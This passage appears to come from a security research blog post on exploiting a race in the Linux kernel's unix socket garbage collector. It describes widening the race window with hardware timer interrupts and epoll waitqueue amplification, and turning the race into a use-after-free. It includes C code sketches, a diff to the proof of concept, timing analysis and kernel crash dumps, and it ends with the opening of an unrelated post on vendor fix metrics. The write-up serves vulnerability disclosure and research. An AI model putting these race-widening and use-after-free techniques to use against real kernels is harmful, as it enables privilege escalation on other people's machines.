However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.
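A sketch of that amplification, using the numbers from the text (500 epoll instances watching 100 duplicate FDs each; error handling and FD-limit tuning omitted):

#include <sys/epoll.h>
#include <unistd.h>

static void add_waitqueue_items(int tfd) {
  int dups[100];
  for (int i = 0; i < 100; i++)
    dups[i] = dup(tfd);          // epoll watches are keyed by FD number
  for (int i = 0; i < 500; i++) {
    int ep = epoll_create1(0);   // deliberately kept open
    for (int j = 0; j < 100; j++) {
      struct epoll_event ev = { .events = EPOLLIN, .data.fd = dups[j] };
      epoll_ctl(ep, EPOLL_CTL_ADD, dups[j], &ev);  // one more waitqueue item
    }
  }
}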

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused (a sketch of this classification follows the list):

  • If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
  • If dup() returns a file descriptor:
      • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
      • If it returns the old victim FD number:
          • If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
          • If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.
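A sketch of that classification logic; recv_nodata() is a hypothetical helper that does a non-blocking recvmsg() on the FD and reports whether the queued SKB has vanished:

int recv_nodata(int fd);  // hypothetical: 1 if the queued SKB is gone

enum outcome { TOO_EARLY, TOO_LATE, SLIGHTLY_LATE, SUCCESS };

static enum outcome classify_attempt(int victim_fd, int dup_ret) {
  if (dup_ret == -1)
    return TOO_EARLY;        // file* was gone before __fget_files() loaded it
  if (dup_ret > victim_fd)
    return TOO_LATE;         // refcount taken and new FD allocated before close()
  // dup_ret == victim_fd: did the GC wrongly eat the queued SKB?
  return recv_nodata(dup_ret) ? SUCCESS : SLIGHTLY_LATE;
}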

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU, running a different kernel from the one shown above (I don't think that makes a difference). Here "0" on the X axis is offset -1 us relative to the timer.

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@

     }

 

+#if 0

     // bounce socket's file refcount over to other cpu

     pin_to(2);

     close(SYSCHK(dup(RESURRECT_FD+1-1)));

     pin_to(1);

+#endif

 

     //printf("setting timer\n");

@@ -352,5 +354,5 @@

     close(loop_root);

     while (ts_is_in_future(spin_stop))

-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));

+      close(SYSCHK(dup(RESURRECT_FD)));

     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):

A sketch of a histogram of race outcomes where the "too early" outcome suddenly drops from 100% probability to 0% probability, and a bit afterwards, the "too late" outcome jumps from 0% probability to 100%

Sure, maybe there is some microarchitectural state that is different between runs, causing timing variations - cache state, branch predictor state, frequency scaling, or something along those lines - but a small number of discrete events that haven't been accounted for should be adding steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:

A sketch of a histogram of race outcomes where the "too early" outcome drops from 100% probability to 0% probability in multiple discrete steps, and overlapping that, the "too late" outcome goes up from 0% probability to 100% in multiple discrete steps

But what the graphs are showing is more of a smooth, linear transition, like this:

A sketch of a histogram of race outcomes where the "too early" outcome's share linearly drops while the "too late" outcome's share linearly rises

And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.

So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?

I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:

A graph showing noise. Delays from deadline TSC to last successful TSC read before interrupt look essentially random, in the range from around -130 to around 10.

As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing difference is also very close to the crystal clock frequency - the TSC/core crystal clock ratio on this machine is 117. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:

A graph showing a clear grouping around 0, roughly in the range -20 to 10, with some noise scattered over the rest of the graph.

This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.
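For reference, the "RDTSC in a loop" measurement mentioned above can be as simple as this sketch, where fired is a placeholder for however the interrupt is observed (e.g. set from a signal handler):

#include <stdint.h>
#include <x86intrin.h>

volatile int fired;  // set once the timer interrupt has been handled

static uint64_t last_tsc_before_interrupt(void) {
  uint64_t last = 0;
  while (!fired)
    last = __rdtsc();  // the timer interrupt lands somewhere in this loop
  return last;         // last TSC value read before execution was cut off
}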

But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):

A graph showing that the skid from programmed interrupt time to execution interruption is around -100 to -30 cycles, the skid to interrupt entry is around 360 to 420 cycles, and the time from execution interruption to interrupt entry has much less timing variance and is at around 440 cycles.

So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.

Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.

The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?

The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:

  1. Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
  2. Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period.

(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)
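A sketch of the rounding step for option 1, assuming the TSC/LAPIC clock ratio is known (e.g. from CPUID leaf 0x15; 117 on the machine measured above); converting the aligned TSC value back into the nanosecond-based absolute time that timerfd_settime() expects is elided:

#include <stdint.h>

static uint64_t align_to_lapic_edge(uint64_t deadline_tsc,
                                    uint64_t tsc_per_lapic) {
  // LAPIC timer edges occur when the TSC is a multiple of the ratio,
  // so round the deadline down to the previous edge.
  return deadline_tsc - (deadline_tsc % tsc_per_lapic);
}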

I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.

(No) surprise: clock speed matters

Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.

Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.

Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and its callees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.
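The same sampling can be approximated from userspace; a rough sketch, assuming root and the msr module (which exposes /dev/cpu/<n>/msr; 0xe7 and 0xe8 are the architectural IA32_MPERF and IA32_APERF MSR numbers):

#include <fcntl.h>
#include <stdint.h>
#include <unistd.h>

static double cur_freq_ratio(const char *msr_path) {
  int fd = open(msr_path, O_RDONLY);  // e.g. "/dev/cpu/1/msr"
  uint64_t m0, a0, m1, a1;
  pread(fd, &m0, 8, 0xe7);
  pread(fd, &a0, 8, 0xe8);
  pread(fd, &m1, 8, 0xe7);            // second sample, back-to-back
  pread(fd, &a1, 8, 0xe8);
  close(fd);
  return (double)(a1 - a0) / (double)(m1 - m0);  // actual vs. base clock ratio
}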

I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):

A graph showing that the timing of successful race attempts depends on the CPU's performance setting - at 11/28 performance, most successful race attempts occur around clock offset -1200 (in TSC units), while at 14/28 performance, most successful race attempts occur around clock offset -1000.

So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.

But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)

Causing a UAF

Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall because details of execution timing are really difficult to understand in detail, and to understand it completely, it might be necessary to use something like Gamozo Labs' "Sushi Roll" and then go through every single instruction in detail and compare the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!

To turn this bug into memory corruption, we have to abuse that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex while the GC actually deletes SKBs from the receive queue without touching the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up - here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:

A graph showing the time spent per GC run depending on the number of queued SKBs. The relationship is roughly linear.
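A minimal sketch of the SKB-queueing part (error handling omitted; the step that makes these sockets unreachable from the FD table - passing them inflight via SCM_RIGHTS and closing the original FDs - is elided):

#include <sys/socket.h>
#include <unistd.h>

static void queue_tiny_skbs(int pairs, int skbs_per_pair) {
  for (int i = 0; i < pairs; i++) {
    int sv[2];
    socketpair(AF_UNIX, SOCK_STREAM, 0, sv);
    for (int j = 0; j < skbs_per_pair; j++)
      send(sv[0], "A", 1, MSG_DONTWAIT);  // each send() queues one tiny SKB
  }
}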

To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():

       /* All candidates should have been detached by now. */

        BUG_ON(!list_empty(&gc_candidates));

gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().

But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.

I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.

When a normal distro kernel is running normally, the UAF reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then a poison overwrite detection, showing that one byte of the poison was incremented:

general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI

CPU: 1 PID: 2655 Comm: hardirq_loop Not tainted 5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Call Trace:

[...]

 unix_stream_recvmsg+0x53/0x70

[...]

 __sys_recvfrom+0x166/0x180

[...]

 __x64_sys_recvfrom+0x25/0x30

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

---[ end trace 39a81eb3a52e239c ]---

=============================================================================

BUG skbuff_head_cache (Tainted: G      D          ): Poison overwritten

-----------------------------------------------------------------------------

INFO: 0x00000000d7142451-0x00000000d7142451 @offset=68. First byte 0x6c instead of 0x6b

INFO: Slab 0x000000002f95c13c objects=32 used=32 fp=0x0000000000000000 flags=0x17ffffc0010200

INFO: Object 0x00000000ef9c59c8 @offset=0 fp=0x00000000100a3918

Object   00000000ef9c59c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000097454be8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000035f1d791: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000af71b907: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000d2d371e: 6b 6b 6b 6b 6c 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkklkkkkkkkkkkk

Object   0000000000744b35: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000794f2935: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006dc06746: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000005fb18682: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000072eb8dd2: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000b5b572a9: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000085d6850b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006346150b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000ddd1ced: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5  kkkkkkkkkkkkkkk.

Padding  00000000e00889a7: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a  ZZZZZZZZZZZZZZZZ

Padding  00000000d190015f: 5a 5a 5a 5a 5a 5a 5a 5a                          ZZZZZZZZ

CPU: 7 PID: 1641 Comm: gnome-shell Tainted: G    B D           5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

Call Trace:

 dump_stack+0x6b/0x83

 check_bytes_and_report.cold+0x79/0x9a

 check_object+0x217/0x260

[...]

 alloc_debug_processing+0xd5/0x130

 ___slab_alloc+0x511/0x570

[...]

 __slab_alloc+0x1c/0x30

 kmem_cache_alloc_node+0x1f3/0x210

 __alloc_skb+0x46/0x1f0

 alloc_skb_with_frags+0x4d/0x1b0

 sock_alloc_send_pskb+0x1f3/0x220

[...]

 unix_stream_sendmsg+0x268/0x4d0

 sock_sendmsg+0x5e/0x60

 ____sys_sendmsg+0x22e/0x270

[...]

 ___sys_sendmsg+0x75/0xb0

[...]

 __sys_sendmsg+0x59/0xa0

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

FIX skbuff_head_cache: Restoring 0x00000000d7142451-0x00000000d7142451=0x6b

FIX skbuff_head_cache: Marking all objects used

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Conclusion(s)

Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and it turns out that time is a complicated concept...

This shows how at least some really tight races can still be hit and we should treat them as security bugs, even if it seems like they'd be very hard to hit at first glance.

Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)

Appendix: How impatient are interrupts?

I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.

On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register, while running this loop:

  400680:        91000442         add        x2, x2, #0x1

  400684:        91000421         add        x1, x1, #0x1

  400688:        9ac20820         udiv        x0, x1, x2

  40068c:        91006800         add        x0, x0, #0x1a

  400690:        91000400         add        x0, x0, #0x1

  400694:        91000442         add        x2, x2, #0x1

  400698:        91000421         add        x1, x1, #0x1

  40069c:        91000442         add        x2, x2, #0x1

  4006a0:        91000421         add        x1, x1, #0x1

  4006a4:        9ac20820         udiv        x0, x1, x2

  4006a8:        91006800         add        x0, x0, #0x1a

  4006ac:        91000400         add        x0, x0, #0x1

  4006b0:        91000442         add        x2, x2, #0x1

  4006b4:        91000421         add        x1, x1, #0x1

  4006b8:        91000442         add        x2, x2, #0x1

  4006bc:        91000421         add        x1, x1, #0x1

  4006c0:        17fffff0         b        400680 <main+0xe0>
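
For reference, here is a minimal sketch of what such a sampling harness could look like (my own reconstruction, not the original tooling; it assumes glibc's ucontext layout, and needs -lrt on older glibc):

// Hypothetical PC-sampling harness: a POSIX interval timer fires at
// 100Hz, and the SIGALRM handler records the program counter at which
// the loop under test was interrupted.
#include <csignal>
#include <ctime>
#include <cstdint>
#include <cstddef>
#include <ucontext.h>

static volatile uint64_t samples[1 << 20];
static volatile size_t nsamples = 0;

static void on_tick(int, siginfo_t *, void *ucontext) {
    ucontext_t *uc = static_cast<ucontext_t *>(ucontext);
#if defined(__aarch64__)
    uint64_t pc = uc->uc_mcontext.pc;              // arm64: interrupted PC
#else
    uint64_t pc = uc->uc_mcontext.gregs[REG_RIP];  // x86-64: interrupted RIP
#endif
    if (nsamples < (1 << 20))
        samples[nsamples++] = pc;
}

int main() {
    struct sigaction sa = {};
    sa.sa_sigaction = on_tick;
    sa.sa_flags = SA_SIGINFO;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGALRM, &sa, nullptr);

    sigevent sev = {};
    sev.sigev_notify = SIGEV_SIGNAL;
    sev.sigev_signo = SIGALRM;
    timer_t t;
    timer_create(CLOCK_MONOTONIC, &sev, &t);

    itimerspec its = {};
    its.it_interval.tv_nsec = 10 * 1000 * 1000;  // 100Hz: fire every 10ms
    its.it_value.tv_nsec = 10 * 1000 * 1000;
    timer_settime(t, 0, &its, nullptr);

    volatile uint64_t x1 = 1, x2 = 1;
    for (;;) {  // stand-in for the assembly loop being measured
        x1 += 1; x2 += 1;
        x1 = x1 / x2 + 0x1a;
    }
    // (Dump samples[] and histogram the PCs once enough have been taken.)
}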

The logged interrupt PCs had the following distribution on a slow in-order core:

A histogram of PC register values, where most instructions in the loop have roughly equal frequency, the instructions after udiv instructions have twice the frequency, and two other instructions have zero frequency.

and this distribution on a fast out-of-order core:

A histogram of PC register values, where the first instruction of the loop has very high frequency, the following 4 instructions have near-zero frequency, and the following instructions have low frequencies

As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when an interrupt arrives while one of those instructions is executing, the instruction runs to completion rather than being aborted?

With the following loop, which has a LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:

  4006a0:        91000442         add        x2, x2, #0x1

  4006a4:        91000421         add        x1, x1, #0x1

  4006a8:        9ac20820         udiv        x0, x1, x2

  4006ac:        91006800         add        x0, x0, #0x1a

  4006b0:        91000400         add        x0, x0, #0x1

  4006b4:        91000442         add        x2, x2, #0x1

  4006b8:        91000421         add        x1, x1, #0x1

  4006bc:        91000442         add        x2, x2, #0x1

  4006c0:        91000421         add        x1, x1, #0x1

  4006c4:        9ac20820         udiv        x0, x1, x2

  4006c8:        91006800         add        x0, x0, #0x1a

  4006cc:        91000400         add        x0, x0, #0x1

  4006d0:        91000442         add        x2, x2, #0x1

  4006d4:        f9400061         ldr        x1, [x3]

  4006d8:        91000421         add        x1, x1, #0x1

  4006dc:        91000442         add        x2, x2, #0x1

  4006e0:        91000421         add        x1, x1, #0x1

  4006e4:        17ffffef         b        4006a0 <main+0x100>

the cache-missing loads obviously have a large influence on the timing. On the in-order core:

A histogram of interrupt instruction pointers, showing that most interrupts are delivered with PC pointing to the instruction after the high-latency load instruction.

On the OOO core:

A similar histogram as the previous one, except that an even larger fraction of interrupt PCs are after the high-latency load instruction.

What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)

On an x86 Skylake CPU, we can do a similar test:

    11b8:        48 83 c3 01                  add    $0x1,%rbx

    11bc:        48 83 c0 01                  add    $0x1,%rax

    11c0:        48 01 d8                     add    %rbx,%rax

    11c3:        48 83 c3 01                  add    $0x1,%rbx

    11c7:        48 83 c0 01                  add    $0x1,%rax

    11cb:        48 01 d8                     add    %rbx,%rax

    11ce:        48 03 02                     add    (%rdx),%rax

    11d1:        48 83 c0 01                  add    $0x1,%rax

    11d5:        48 83 c3 01                  add    $0x1,%rbx

    11d9:        48 01 d8                     add    %rbx,%rax

    11dc:        48 83 c3 01                  add    $0x1,%rbx

    11e0:        48 83 c0 01                  add    $0x1,%rax

    11e4:        48 01 d8                     add    %rbx,%rax

    11e7:        eb cf                        jmp    11b8 <main+0xf8>

with a similar result:

A histogram of interrupt instruction pointers, showing that almost all interrupts were delivered with RIP pointing to the instruction after the high-latency load.

This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)

A walk through Project Zero metrics

By: Ryan
10 February 2022 at 16:58

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

